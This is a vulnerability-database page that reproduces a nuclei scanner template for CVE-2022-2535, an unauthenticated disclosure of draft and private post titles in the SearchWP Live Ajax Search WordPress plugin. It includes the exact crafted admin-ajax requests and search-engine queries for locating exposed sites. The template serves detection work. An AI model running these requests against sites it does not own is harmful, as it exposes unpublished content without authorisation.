Lucene search
K

SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 72 Views

SearchWP Live Ajax Search Unauthenticated Arbitrary Post Title Disclosur

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-2535
15 Aug 202211:21
attackerkb
Circl
CVE-2022-2535
15 Aug 202214:37
circl
CNNVD
WordPress plugin SearchWP Live Ajax Search 安全漏洞
15 Aug 202200:00
cnnvd
CVE
CVE-2022-2535
15 Aug 202208:38
cve
Cvelist
CVE-2022-2535 SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
15 Aug 202208:38
cvelist
EUVD
EUVD-2022-34789
15 Aug 202208:38
euvd
NVD
CVE-2022-2535
15 Aug 202211:21
nvd
OSV
CVE-2022-2535
15 Aug 202211:21
osv
Patchstack
WordPress SearchWP Live Ajax Search plugin <= 1.6.1 - Unauthenticated Arbitrary Post Title Disclosure vulnerability
25 Jul 202200:00
patchstack
Prion
Code injection
15 Aug 202211:21
prion
Rows per page
id: CVE-2022-2535

info:
  name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
  author: r3Y3r53,daffainfo
  severity: medium
  description: |
    The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink
  impact: |
    Unauthenticated attackers can access titles and permalinks of private, draft, and pending posts through crafted live search queries with manipulated post_status parameters, potentially exposing confidential content before publication.
  remediation: |
    Fixed in version 1.6.2
  reference:
    - https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2535
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-2535
    cwe-id: CWE-639
    epss-score: 0.01464
    epss-percentile: 0.70368
    cpe: cpe:2.3:a:searchwp:searchwp_live_ajax_search:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: searchwp
    product: searchwp_live_ajax_search
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/searchwp-live-ajax-search/
    fofa-query: body=/wp-content/plugins/searchwp-live-ajax-search/
    publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/"
  tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp,vuln

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=publish HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && status_code_2 == 200'
          - 'contains(content_type_1, "text/html") && contains(content_type_2, "text/html")'
          - 'contains(body_1, "searchwp-live-search-result") && contains(body_2, "searchwp-live-search-result")'
          - "len(body_1) != len(body_2)"
        condition: and
# digest: 490a0046304402207d0f574ba234ae3fc6f750feb679ad32fc235701a7dd399e825933719346dac102206edc0b618fb6ccde696a4d282a70fbbc2dea12bf964dd3d14ead4d70d1a8d328:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.15.3
EPSS0.01464
72